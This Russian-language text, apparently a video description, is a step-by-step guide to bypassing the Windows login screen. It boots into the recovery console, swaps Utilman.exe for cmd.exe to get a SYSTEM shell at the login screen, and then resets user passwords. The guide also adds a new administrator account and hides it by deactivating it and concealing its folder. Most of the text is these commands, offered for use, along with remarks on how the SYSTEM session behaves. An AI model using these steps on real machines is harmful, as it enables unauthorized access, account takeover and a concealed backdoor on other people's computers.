Кратко о том, что находится на видео:
1) Вы включаете компьютер и несколько раз перезагружаете его в момент запуска Windows. (Для этого нужно нажать на специальную кнопку на стационарном ПК или около 5 секунд удерживать кнопку включения на Ноутбуке)
2) Запустится утилита автоматического восстановления. Ждём завершения. Выбираем "дополнительно" - "Поиск и устранение неисправностей" - "Дополнительно" - "Командная строка".
В открывшейся консоли вбиваем:
1)C:
2)cd windows
3)cd system32 (какая папка system в 64-x версии я не знаю)
4)ren Utilman.exe Utilmanorig.exe (название можете сделать любое)
5)copy cmd.exe Utilman.exe
6)Перезагружаем компьютер
3)Нажимаем на кнопку специальных возможностей
4)В открывшейся консоли вбиваем:
net user *имя_пользователя* *пароль*
(Имя пользователя не длинее 20 символов. Если в имени присутствуют пробелы пишем в начале и конце имени "
Например: net user "Admin the king" 1234567890)
Готово!
А теперь к особенностям данной уязвимости.
1) Такое возможно из-за того, что мы открываем консоль от имени Системы. Вбив в консоль taskmgr (Диспетчер задач) в "Подробности" вы сможете увидеть, что любой запущенный вами процесс имеет приписку о том, что он запущен пользователем "SYSTEM".
2) При попытке открыть explorer у вас появится панель Пуск, однако нормальное взаимодействие происходит только со списком открытых приложений. Открыть проводник или меню пуск вы так и не сможете. Среди открытых приложений будет Winlogon.exe, однако он никак не реагирует на попытку закрыть его или "Свернуть все окна".
3)При попытке закрыть процесс входа в систему (winlogon.exe) он откроется заново. При "завершить дерево процессов" через resmon происходит тоже самое.
4) При открытии Steam я смог войти в аккаунт и увидеть свой баланс, однако библиотека, магазин, инвентарь и т.д. просто не загружались. Дополнительные окна (настройки, музыкальный плеер) не открывались. Хотя сама музыка вполне проигрывалась. (Я не проверял Offline-мод и не пытался запустить игры через ярлыки)
P.S. При первом запуске будет английский язык. Просто войдите в аккаунт и перезагрузите Steam.
5) Undertale (пиратка) - работает! Однако, так как сохранения хранятся в папке пользователя... Да и возможность сохранятся я так и не проверил. (Однако, учитывая то, что Steam смог сохранить данные об аккаунте, скорее всего сохранения работают нормально)
6) Открыв notepad и выбрав "Открыть" или "Сохранить как" вы сможете более менее воспользоватся проводником. Файлы надо открывать через правую кнопку мыши.
7)Открытый диспетчер задач (taskmgr) сильно конфликтует с 6 особенностью.
А теперь самая главная особенность данной уязвимости!
Вбив в консоль net user *имя_пользователя* /add вы добавите нового пользователя, который имеет лишь обычные права пользователя. Однако...
net localgroup Пользователь /delete *имя_пользователя*
net localgroup Администратор /add *имя_пользователя*
В моём случае ещё был net localgroup "Debugger users" /add *имя_пользователя*
Полный список подобных групп net localgroup.
Узнать подробности группы net localgroup *название_группы* (если в названии есть пробелы, то надо писать его в ""
Например: net localgroup "Администратор Hyper-V" (и такое там есть...) /add *имя_пользователя*
В случае, если новый аккаунт не отображается после перезагрузки компьютера нужно активировать его net user *имя_пользователя* /active:yes
Чтобы спрятать аккаунт (деативировать его) net user *имя_пользователя* /active:no
Чтобы поставить пароль net user *имя_пользователя* *пароль*
Чтобы удалить аккаунт net user *имя_рользователя* /delete
Если ввести net user *имя_пользователя* * то вам предложат ввести пароль. Это ничего не даёт и скорее всего служит лишь для быстрой проверки пароля.
Подробнее можно узнать вбив net user /help
Список аккаунтов на ПК net user
Подробности аккаунта net user *имя_пользователя*
Если скрыть папку пользователя через "Свойства" и деактивировать (спрятать) аккаунт, то о новом пользователе можно будет узнать только либо через "отображение скрытых папок и файлов" или net user.
Такая уязвимость очень опасна, однако её не исправляют... Я даже не знаю - это лень или реально трудно это исправить? Или возможность открыть консоль в случае заражения ПК вирусом или при проблемах установки Windows действительно настолько важна?